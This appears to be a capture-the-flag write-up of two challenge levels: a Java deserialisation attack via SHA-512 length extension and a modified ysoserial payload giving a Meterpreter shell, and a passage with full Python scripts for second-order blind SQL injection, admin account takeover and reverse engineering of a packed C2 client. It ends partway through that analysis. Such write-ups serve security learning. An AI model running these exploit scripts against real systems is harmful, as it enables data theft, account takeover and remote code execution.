PSPS: No palindromes will be tolerated! Nor are emordnilaps, and semordnilaps!

By the way, please quote the following before entering the party:


ed4a1a59-0869-48ad-8bc6-ac64b04b02b6

TISC{mu5t_53ll_4t_th3_t4l13sT_5UM}

Part 4: A Mad Tea Party

Great! We have all we need to attend the Tea Party!

To get an idea of what to expect, we've consulted with our informant (initials C.C) who advised:

“Attend the Mad Tea Party.

Come back with (what's in) the Hatter's head.

Sometimes the end of a tale might not be the end of the story.

Things that don't make logical sense can safely be ignored.

Do not eat that tiny Hello Kitty.”

This is nonsense to us, so you're on your own from here on out.

As described in the invitation letter, the challenge ran the final Java application a-mad-tea-party on localhost port 4714.

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"

Based on the source code of the application at tea-party/src/main/java/com/mad/hatter/App.java, I decided that the most likely exploit vector was the “Eat Cake” option, which would deserialise the fireworks byte array into a Firework object before executing firework.fire():

case 9:
    System.out.println("You eat the cake and you feel good!");

    for (Cake.Decoration deco : cakep.getDecorationsList()) {
        if (deco == Cake.Decoration.TINY_HELLO_KITTY) {
            running = false;
            System.out.println("A tiny Hello Kitty figurine gets lodged in your " +
                    "throat. You get very angry at this and storm off.");
            break;
        }
    }

    if (cakep.getFireworksCount() == 0) {
        System.out.println("Nothing else interesting happens.");
    } else {
        for (ByteString firework_bs : cakep.getFireworksList()) {
            byte[] firework_data = firework_bs.toByteArray();
            Firework firework = (Firework) conf.asObject(firework_data);    // deserialisation
            firework.fire();
        }
    }
    break;

I believed this was the exploit vector because Java deserialisation was an infamous code execution method. However, I could not add a deserialisation payload using “Add Firework” because it only allowed me to select from a pre-set list of fireworks.

Which firework do you wish to add?

  1. Firecracker.
  2. Roman Candle.
  3. Firefly.
  4. Fountain.

Firework: 1
Firework added!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

These fireworks had unexciting payloads, as seen in Firefly.java:

package com.mad.hatter;

public class Firefly extends Firework {

    static final long serialVersionUID = 45L;

    public void fire() {
        System.out.println("Firefly! Firefly! Firefly! Firefly! Fire Fire Firefly!");
    }

}

Meanwhile, the “Cake to Go” option exported my current cake in the format {"cake":"<HEX(BASE64(PROTOBUF-SERIALISED CAKE DATA))>","digest":"<ENCRYPTED HASH>"}.

Choice: 7
Here's your cake to go:
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}

I could also import cakes with the “Go to Cake” option.

Choice: 8
Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

This looked like a good way to smuggle my own Firework data. However, the source code revealed that the application properly validated the digest value using a SHA-512 hash.

case 8:

    System.out.print("Please enter your saved cake: ");

    scanner.nextLine();
    String saved = scanner.nextLine().trim();

    try {

        HashMap<String, String> hash_map = new HashMap<String, String>();
        hash_map = (new Gson()).fromJson(saved, hash_map.getClass());
        byte[] challenge_digest = Hex.decodeHex(hash_map.get("digest"));
        byte[] challenge_cake_b64 = Hex.decodeHex(hash_map.get("cake"));
        byte[] challenge_cake_data = Base64.decodeBase64(challenge_cake_b64);

        MessageDigest md = MessageDigest.getInstance("SHA-512");
        byte[] combined = new byte[secret.length + challenge_cake_b64.length];
        System.arraycopy(secret, 0, combined, 0, secret.length);
        System.arraycopy(challenge_cake_b64, 0, combined, secret.length,
                challenge_cake_b64.length);
        byte[] message_digest = md.digest(combined);

        if (Arrays.equals(message_digest, challenge_digest)) {
            Cake new_cakep = Cake.parseFrom(challenge_cake_data);
            cakep.clear();
            cakep.mergeFrom(new_cakep);
            System.out.println("Cake successfully gotten!");
        }
        else {
            System.out.println("Your saved cake went really bad...");
        }
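The check above can be restated in a few lines of Python to make the data flow easier to follow. This is a sketch under assumptions, not the application's code: DEMO_SECRET stands in for the real 32-byte secret, export_cake is my guess at the inverse of the import logic, and the sample cake bytes are the empty cake used later in this write-up.

```python
import base64
import hashlib

# Hypothetical stand-in for the real secret on the server.
DEMO_SECRET = b"\x00" * 32


def export_cake(secret, cake_proto):
    """Assumed inverse of the import: hex(base64(protobuf)) plus a digest."""
    cake_b64 = base64.b64encode(cake_proto)
    digest = hashlib.sha512(secret + cake_b64).digest()
    return {"cake": cake_b64.hex(), "digest": digest.hex()}


def import_cake(secret, saved):
    """Mirror of the Java check: hash secret + base64 bytes, then compare."""
    cake_b64 = bytes.fromhex(saved["cake"])
    expected = hashlib.sha512(secret + cake_b64).digest()
    if expected != bytes.fromhex(saved["digest"]):
        raise ValueError("Your saved cake went really bad...")
    return base64.b64decode(cake_b64)


saved = export_cake(DEMO_SECRET, b'\n\x00\x10\x00"\x00')
print(saved["cake"])
print(import_cake(DEMO_SECRET, saved))
```

Note that the digest covers the base64 text rather than the decoded protobuf bytes, and that the secret is simply prepended before hashing.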

In order to forge my own arbitrary cake data, I needed to pass this check. I found a great Dragon CTF 2019 writeup that covered a similar challenge involving protobuf-serialised data and an MD5 hash verification. However, while MD5 collisions are easy to create, this application used SHA-512, which should be infeasible to brute force or collide, not that it stopped me from trying. After many fruitless attempts at cracking the hash, I pondered the challenge description again. “Things that don't make logical sense can safely be ignored” clearly warned me against taking on the impossible like cracking SHA-512. But what did “Sometimes the end of a tale might not be the end of the story” mean?

After several more hours of aimless wandering, I found a StackExchange discussion about breaking SHA-512. One of the answers struck me:

Are there any successful attacks out there?

No, except length extension attacks, which are possible on any unaltered or extended Merkle-Damgard hash construction (SHA-1, MD5 and many others, but not SHA-3 / Keccak). If that's a problem depends on how the hash is used. In general, cryptographic hashes are not considered broken just because they suffer from length extension attacks.

Length extension attacks... “Sometimes the end of a tale might not be the end of the story”... I facepalmed for probably the hundredth time in the competition.

The application prepended a salt (the secret variable) to the base64-encoded cake data, then generated a SHA-512 hash of the concatenated string. Furthermore, the source code revealed the length of secret:

public static byte[] get_secret() throws IOException {
    // Read the secret from /home/hatter/secret.
    byte[] data = FileUtils.readFileToByteArray(new File("/home/hatter/secret"));
    if (data.length != 32) {
        System.out.println("Secret does not match the right length!");
    }
    return data;
}

This was a classic setup for a hash extension attack. I won't re-hash the explanation: there is a hash_extender repository on GitHub that breaks down this attack. Even better, it includes a tool to perform the hash extension attack on several hash algorithms, including SHA-512. Thanks, Ron Bowes!
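One piece of the attack is easy to reproduce by hand: the padding that SHA-512 appends internally, which has to appear inside the forged message between the original data and the appended data. The sketch below only builds that message; it does not compute the forged digest, which needs a SHA-512 implementation that can resume from a known state (the part hash_extender handles). The function names are my own, and the sample values are the empty exported cake and the appended field used in this write-up.

```python
def sha512_glue_padding(message_len):
    """Padding SHA-512 adds to a message of message_len bytes."""
    padding = b"\x80"
    # Zero-fill until the length is 112 mod 128, leaving room for the
    # 16-byte big-endian bit length that closes the block.
    padding += b"\x00" * ((112 - (message_len + 1)) % 128)
    padding += (message_len * 8).to_bytes(16, "big")
    return padding


def forged_message(data, append, secret_len):
    """What the attacker submits: data + glue padding + appended bytes."""
    return data + sha512_glue_padding(secret_len + len(data)) + append


forged = forged_message(b"CgAQACIA", b"EAE=", secret_len=32)
print(len(forged), forged)
```

Only the length of the secret is needed to build this, which is why the length check in get_secret() was such a useful leak.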

I generated a test payload to append candles = 1 in Protobuf format to the data I had previously exported using the Cake to Go function.

> hash_extender/hash_extender -l 32 -d CgAQACIA -s <ORIGINAL HASH> -f sha512 -a EAE=
> <FORGED MESSAGE DIGEST>
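To see what the two base64 strings in that command contain, the Protobuf wire format can be decoded by hand. The sketch below is a minimal decoder that only handles the two wire types present here (varint and length-delimited); it does not know the cake schema, so it reports field numbers rather than names.

```python
import base64


def read_varint(buf, pos):
    """Decode one base-128 varint starting at pos; return (value, new_pos)."""
    result = 0
    shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def decode_fields(data):
    """Return (field_number, wire_type, value) tuples for a flat message."""
    fields = []
    pos = 0
    while pos < len(data):
        key, pos = read_varint(data, pos)
        field_no, wire_type = key >> 3, key & 7
        if wire_type == 0:          # varint
            value, pos = read_varint(data, pos)
        elif wire_type == 2:        # length-delimited (strings, bytes)
            length, pos = read_varint(data, pos)
            value = data[pos:pos + length]
            pos += length
        else:
            raise ValueError("wire type not handled in this sketch")
        fields.append((field_no, wire_type, value))
    return fields


original = decode_fields(base64.b64decode("CgAQACIA"))
appended = decode_fields(base64.b64decode("EAE="))
print(original)
print(appended)
```

The exported cake carries an empty field 1, a zero in field 2 and an empty field 4, while the appended bytes set field 2 to 1. When a non-repeated scalar field appears twice, Protobuf parsers keep the last value, so appending is enough to override it.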

I tested the modified JSON by importing it into the application using the Go to Cake function.

Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: ""
candles: 1
flavour: ""

Great success!

After confirming that the hash length extension attack allowed me to forge my own cake data, I moved on to generate a deserialisation payload. ysoserial appeared to be the obvious tool of choice, but according to the pom.xml manifest, the application only imported commons-beanutils whereas the ysoserial CommonsBeanutils1 payload required commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2. Fortunately, after checking some of the pull requests for the repository, I discovered one that removed the additional dependencies. Pumped with excitement, I cloned the repo, modified the code based on the pull request, generated my payload, and sent my hash-extended data. It didn't work.

Checking the error messages, I realised to my horror that the application did not use the standard ObjectInputStream deserialisation. Instead, it was using the FST library to serialise and deserialise payloads and thus required a completely different serialisation format. To get the ysoserial payload to work, I modified the tool's source code in GeneratePayload.java to use FST instead of ByteArrayOutputStream.

public class GeneratePayload {
	private static final int INTERNAL_ERROR_CODE = 70;
	private static final int USAGE_CODE = 64;

	static FSTConfiguration conf = FSTConfiguration.createDefaultConfiguration();

    ...

		try {
			final ObjectPayload payload = payloadClass.newInstance();
			final Object object = payload.getObject(command);
			PrintStream out = System.out;
			byte[] payload_data = conf.asByteArray(object);
			FileOutputStream outputStream = new FileOutputStream("payload.hex");
			outputStream.write(payload_data);

I re-compiled ysoserial, generated my payload, and sent it off. However, it crashed again when entering my JSON payload. What went wrong? Looking at the error messages, I realised that the program cut off my input at 4096 bytes. This was because the code used scanner.nextLine() to accept input, which was limited to 4096 bytes at a time. At my wits' end, I made a last-ditch attempt by port forwarding the application via my Meterpreter shell, then used pwntools to send the input directly instead of copying and pasting my payload.

from pwn import *

## p = process(['java', '-jar','opt/wonderland/a-mad-tea-party/tea-party/target/tea-party-1.0-SNAPSHOT.jar'])
p = remote('<IP ADDRESS>', 4445)

print(p.recvuntil(b"Invitation Code:"))
p.sendline(b'<INVITATION CODE>')
print(p.recvuntil(b"Choice:"))
p.sendline(b'8')
p.sendline(b'{"cake":"<CAKE DATA>","digest":"<DIGEST>"}')

p.interactive()

To my huge relief, it worked and I got my Meterpreter shell! I was finally at the end of this long rabbit hole. Take a bow!

Success

TISC{W3_y4wN_A_Mor3_r0m4N_w4y}

Level 10: Malware for UwU

Domains: Web, Binary Exploitation (Windows Shellcoding), Reverse Engineering, Cryptography

We've found a PALINDROME webserver, suspected to be the C2 Server of a newly discovered malware! Get the killswitch from the bot masters before the malware goes live!

May the Force (not brute force) be with UwU!

http://18.142.2.80:18080/

The final countdown! I headed to the website which featured a simple login page.

Login Page

I could register as a user without any problems.

Register Page

After registering, I logged in to a simple dashboard.

Normal User

The beautiful bird image was in fact a huge series of styled <span> elements.

<span class="ascii" style="display:inline-block;white-space:pre;letter-spacing:0;line-height:1;font-family:'BitstreamVeraSansMono','CourierNew',Courier,monospace;font-size:16px;border-width:1px;border-style:solid;border-color:lightgray;">
    <span style="background-color:#d7875f;color: #d7af87;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span><
    ...
</span>

Since the original domain description for this level omitted Web, I suspected this was a Cryptography challenge and got tangled up trying to analyse the hexadecimal colour values. After several fruitless hours, I clarified this with the organisers and they corrected the domain list to include Web. This prompted me to look for Web attack vectors instead. The “Contact your PALINDROME admin for further instructions!” text suggested that an admin user account existed so I began looking for a possible SQL injection. At first, I thought that the login form was vulnerable because sending %27+OR+%27 in the password field caused the response to drop. However, I eventually decided that this was a deliberate red herring because %27+OR++%27, which should have been interpreted the same as %27+OR+%27 in SQL syntax, did not drop the response.

Moving on, I noticed something interesting when I added a single quote to all of the form values while registering a new user.

POST /new_user.php HTTP/1.1
Host: <IP ADDRESS>:18080
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP ADDRESS>:18080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=johndoe'&password=johndoe'&recovery_q1=Q1'&recovery_a1=johndoe'&recovery_q2=Q2'&recovery_a2=johndoe'&recovery_q3=Q4'&recovery_a3=johndoe'

When I tried to reset the user's password with recovery questions, the password reset self-service correctly fetched the user but failed to fetch any of the recovery questions.

Bugged Password Reset

This suggested that an SQL injection had occurred in the SQL statement fetching the user's recovery questions. I guessed that the statement partly resembled select question_text from recovery_questions where recovery_id = '<UNSANITISED VALUE OF recovery_q1 FROM REGISTRATION>'. As such, I could exploit a two-step SQL injection by signing up with the SQL payload in the recovery_q1 parameter, then retrieving the result at the user's password reset page. Unfortunately, after further testing I discovered that the application ran a filter on UNION in my payload that prevented me from directly leaking additional strings; all UNION payloads failed even though typical ' AND '1'='1 injections worked. Furthermore, the SELECT INTO OUTFILE remote code execution vector also failed. Instead, I relied on boolean-based output. If my injected statements evaluated to true, the password reset page would correctly fetch the user's recovery question text. If they evaluated to false, the recovery question text would be missing.
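To make the two-step injection concrete, here is how a stored recovery_q1 value would land in the statement I guessed at. Everything in this sketch is an assumption: the query text is only my guess from above, and build_query is a hypothetical helper that mimics naive string concatenation on the server.

```python
# Guessed shape of the server-side statement, not confirmed by source code.
GUESSED_QUERY = "select question_text from recovery_questions where recovery_id = '{}'"


def build_query(recovery_q1):
    """Mimic unsanitised concatenation of the stored registration value."""
    return GUESSED_QUERY.format(recovery_q1)


true_probe = build_query("Q1' AND (1=1)#")
false_probe = build_query("Q1' AND (1=2)#")
print(true_probe)
print(false_probe)
```

The trailing # comments out the leftover quote in MySQL. The first probe still matches the Q1 row, so the question text appears on the reset page; the second matches nothing, so it goes missing. That one bit of difference is the whole oracle.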

This required massive numbers of registration and password reset requests, forcing me to automate my SQL injection. I used GUIDs for the usernames to avoid collisions in registration. My first order of business was to enumerate the table names. I leaked the number of tables and then retrieved the names of the last few tables to ensure that they were user-created rather than system tables.

import requests
import uuid
import string

NEW_USER_URL = 'http://<IP ADDRESS>:18080/new_user.php'
FORGOT_PASSWORD_URL = 'http://<IP ADDRESS>:18080/forgot_password.php'
CANDIDATE_LETTERS = string.printable

## Get number of tables
## 63
## appdb
def leak_table_count():
    count = 0
    found = False
    while not found:
        username = uuid.uuid4().hex
        payload = {
            'username': username, 
            'password': username,
            'recovery_q1': 'Q1',
            'recovery_a1': username,
            'recovery_q2': 'Q2',
            'recovery_a2': username,
            'recovery_q3': 'Q3',
            'recovery_a3': username
        }

        payload['recovery_q1'] = "Q1' AND ((SELECT COUNT(*) from information_schema.tables)='{}')#".format(count)
        r = requests.post(NEW_USER_URL, data=payload)
        # print(r.text)
        if 'New UwUser registered!' in r.text:
            print("CREATED USER WITH PAYLOAD {}".format(payload))
        else:
            print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
            exit(-1)
        r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
        if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
            print("CANDIDATE SUCCESS")
            found = True
        else:
            print("CANDIDATE FAILED")
            # Only advance on a miss so that count still holds the matching value below.
            count += 1

    print("Number of tables: {}".format(count))


## Get table name (start from last few tables to get user tables)
## innodb_sys_tablestats, qnlist, userlist
def leak_table_name(table_number):
    table_name = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }

            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT table_name from information_schema.tables LIMIT {}, 1), 1, {})) = BINARY '{}'#".format(table_number, len(table_name) + 1, table_name + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                table_name += candidate_letter
                print(table_name)
                break
            else:
                print("CANDIDATE FAILED")
    print(table_name)

Now that I had the table names qnlist and userlist, I retrieved their column names.

## Get concatted column names for the table
## username,pwdhash,usertype,email,recover_q1,recover_a1,recover_q2,recover_a2,recover_q3,recover_a3
## q_tag, q_body
def leak_column_names(table_name):
    column_names = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = '{}'), 1, {})) = BINARY '{}'#".format(table_name, len(column_names) + 1, column_names + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                column_names += candidate_letter
                print(column_names)
                break
            else:
                print("CANDIDATE FAILED")
    print(column_names)

usertype suggested that there indeed existed an admin user in the database. I began retrieving all of the users' data.

## Leaks user data (only leak essential columns to takeover)
## TeoYiBoon,3043b513222221993f7ade356f521566,0,[email protected],Q2,Dirty Gorilla,Q6,Mark Zuckerberg,Q7,Fox
## oscarthegrouch,3043b513244444993f7ade356f521566,0,[email protected],Q3,cat recycle bin,Q4,Operation Garbage Can,Q5,5267385
## barney,3043b513244555993f7ade356f521566,0,[email protected],Q1,Major Planet,Q4,Operation Garbage Can,Q7,Purple dinosaur
## rollrick,3043b513244556993f7ade356f521566,0,[email protected],Q2,Rick n Roll,Q3,Operation RICKROLL,Q6,PICKLE RICKKKK
## noobuser,3043b513111111993f7ade356f521566,0,[email protected],Q1,Boba Abob,Q2,Eternal Fuchsia,Q3,Troll your buddy
def leak_user_data(user_number):
    user_data = ''
    found = True

    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            # CONCAT(username,',',usertype,',',email,',',recover_a1,',',recover_a2,',',recover_a3)
            # payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(HEX(recover_a1),',',HEX(recover_a2),',',HEX(recover_a3)) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter) # for my boy c1-admin
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(recover_a1,',',recover_q2,',',recover_a2,',',recover_q3,',',recover_a3) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            # if 'New UwUser registered!' in r.text:
            #     print("CREATED USER WITH PAYLOAD {}".format(payload))
            if 'New UwUser registered!' not in r.text:
                # print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                # print("CANDIDATE SUCCESS: {}".format(ord(candidate_letter)))
                found = True
                user_data += candidate_letter
                print(user_data)
                break
            # else:
                # print("CANDIDATE FAILED")
        # break
    print(user_data)
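All of the leak functions above share the same loop: guess one character, ask the yes/no oracle, and extend the recovered string on a hit. The sketch below isolates that loop so it can be run offline. The extract function and the fake oracle are hypothetical; in the real scripts the oracle is the pair of requests to new_user.php and forgot_password.php.

```python
import string

CANDIDATE_LETTERS = string.printable


def extract(oracle, max_length=256):
    """Recover a string one character at a time from a yes/no oracle."""
    recovered = ''
    while len(recovered) < max_length:
        for candidate in CANDIDATE_LETTERS:
            # Positions are 1-based, matching SQL's SUBSTRING.
            if oracle(len(recovered) + 1, candidate):
                recovered += candidate
                break
        else:
            # No candidate matched: end of the value, or a character
            # outside CANDIDATE_LETTERS.
            return recovered
    return recovered


def make_fake_oracle(secret):
    """Local stand-in for the register-then-reset round trip."""
    def oracle(position, candidate):
        return secret[position - 1:position] == candidate
    return oracle


print(extract(make_fake_oracle("userlist")))
```

Each character costs up to len(CANDIDATE_LETTERS) oracle calls, and every call is two HTTP requests, which is why the real extraction took so many registrations.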

I needed to HEX the fetched user's data because when my script reached the juicy laojiao-c2admin user, it exited early on recovery answer 2, returning X. I suspected that there was some kind of special character in the way. Indeed, the user's answer to What is the name of an up and coming evil genius that inspires you? turned out to be X Æ A-12. Along the way, I modified my script to leak a few additional values and confirmed that the current examdbuser@localhost user lacked FILE permissions. Additionally, I found out that the application sanitised union to onion and sleep to sheep. Eventually, I finished extracting the admin user's data: laojiao-c2admin,1,[null],6-235-35-35,X Æ A-12,Nat Uwu Tan.
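The reason HEX helped can be reproduced locally: the troublesome character is not in string.printable, so no candidate could ever match it, whereas its hex form uses only characters that are. This sketch assumes the column was stored as UTF-8, which I did not verify on the server.

```python
import string

answer = "X Æ A-12"

# Characters the brute-force alphabet can never guess.
unreachable = [ch for ch in answer if ch not in string.printable]

# Equivalent of MySQL's HEX() on the value, assuming UTF-8 storage.
hexed = answer.encode("utf-8").hex().upper()

print(unreachable)
print(hexed)
print(bytes.fromhex(hexed).decode("utf-8"))
```

Leaking the hex string doubles the number of characters to extract, but every one of them is guaranteed to be in the candidate set.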

I successfully reset laojiao-c2admin's password using the recovery answers and logged in. This time, I encountered the same dashboard with an important change at the bottom: instead of “Contact your PALINDROME admin for further instructions!”, there was a link to download a binary named UwU.exe!

I downloaded UwU.exe and attempted to execute it, but it exited immediately. I opened it in PE-bear and noticed that the .text and .data sections had been replaced by .MPRESS1 and .MPRESS2.

PE-bear

I Googled this and found out that this was an indicator that the executable had been packed by the MPRESS packer. There were several tutorials online that described how to manually unpack such executables, but I wanted to try some automated options first. Here's a list of the ones I used.

  1. Avast RetDec: Failed to recognise the MPRESS packing.
  2. unipacker: Managed to unpack but set the original entry point too early so the executable crashed.
  3. QuickUnpack: The OG unpacker. It was difficult to find a working copy and I had to download it in a hermetically sealed VM and take a shower afterwards. Unsurprisingly, this was the only unpacker that worked perfectly.

With the unpacked UwU.exe, I could now easily decompile and debug it.

I executed the binary and was blasted by the song of my people.

UwU Start

Right away, I tried the “Display Killswitch” option and enjoyed another sweet, sweet lullaby but no killswitch flag.

UwU Killswitch

Next, I ran the “Register Bird” option, which prompted me for an IP address and port. I set these to the website's IP address and port and successfully registered. Additionally, this triggered an HTTP request that I captured using Wireshark.

POST /register.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 60
Host: <IP ADDRESS>:18080

action=register&a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:33:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 48
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma

Next, I selected “Send Message”, which accepted a target UwUID and message before sending another HTTP request.

POST /send.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 28
Host: <IP ADDRESS>:18080

action=send&a=ABCDEF&b=HELLO

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:35:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Finally, I tested “Receive Messages”, which sent the following HTTP request every few seconds.

POST /receive.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 56
Host: <IP ADDRESS>:18080

UwUID=oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma
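
All three requests are ordinary form posts, so their bodies can be rebuilt outside the binary. The sketch below only constructs the bodies and compares their sizes with the captured Content-Length headers. It sends nothing, and the variable names are illustrative.

```python
from urllib.parse import urlencode

# Bodies rebuilt from the captured traffic; nothing is sent here.
register_body = urlencode({
    "action": "register",
    "a": "roVwGx", "b": "gD4ZuM", "c": "pFvulv", "d": "XH2CPq", "e": "I3Yonk",
})
send_body = urlencode({"action": "send", "a": "ABCDEF", "b": "HELLO"})

# urlencode percent-encodes the '+' in the base64 UwUID, as the client did
receive_body = urlencode(
    {"UwUID": "oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma"}
)

for body in (register_body, send_body, receive_body):
    print(len(body), body)
```

The lengths line up with the Content-Length values of 60, 28 and 56 in the captures, which suggests the client adds nothing else to the body.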

I also popped the executable into VirusTotal and ANY.RUN to observe more static or dynamic behaviour but did not glean anything new. I moved on to reverse engineering the unpacked executable, starting with the register function.

The binary featured many dead ends. For example, it included unreachable code like this.

  switch ( rand() % 5 )   // actually, none of these will happen right? can safely ignore
  {
    case 44:
      display_logo();
      break;
    case 88:
      display_killswitch();
      break;
    case 132:
      sub_557571D0(v39, e_flat);
      sub_55752C60(v39[0], (int)v39[1], (int)v39[2], (int)v39[3], (int)v39[4], v40);
      break;
    case 176:
      receive_messages(v41);
      break;
    case 220:
      register_bird(v41);
      break;
    case 264:
      send_message(v41);
      break;
    default:
      break;

Additionally, the binary used very few plaintext strings, preferring to decrypt them dynamically. For example, the following function returned the value “Not registered”:

void __thiscall sub_557574E0(_BYTE *this)
{
  unsigned int v1; // ebx
  unsigned int v2; // esi

  if ( this[15] )
  {
    v1 = 0;
    v2 = 0;
    do
    {
      this[v2] ^= 0x5AA5D2B4D39B2B69ui64 >> (8 * (v2 & 7));
      v1 = (__PAIR64__(v1, v2++) + 1) >> 32;
    }
    while ( __PAIR64__(v1, v2) < 0xF );
    this[15] = 0;
  }
}

I decrypted these dynamically by setting breakpoints at the ret instruction and dumping EAX.
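
The same decoding could also be done statically. The sketch below mirrors the loop in sub_557574E0: 15 bytes, each XORed with one byte of the 64-bit constant, lowest byte first. The encrypted bytes themselves are not quoted in this post, so the example round-trips a known string instead of decoding real data from the binary.

```python
KEY = 0x5AA5D2B4D39B2B69  # 64-bit constant from sub_557574E0


def xor_string(buf: bytes, key: int = KEY, length: int = 15) -> bytes:
    """XOR the first `length` bytes with the key, cycling through its 8 bytes."""
    out = bytearray(buf)
    for i in range(min(length, len(out))):
        out[i] ^= (key >> (8 * (i & 7))) & 0xFF
    return bytes(out)


# Hypothetical stand-in for the encrypted bytes embedded in the binary
plain = b"Not registered\x00"
blob = xor_string(plain)

print(blob.hex())
print(xor_string(blob))  # XOR is its own inverse
```

Because XOR is symmetric, one function both encrypts and decrypts, which is why the binary needs the flag byte at this[15] to avoid decoding a string twice.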

The first question I wanted to answer was how the binary generated the seemingly random a, b, c, d, and e parameters in the POST /register.php request. I found the obfuscated loop further down in the main function.

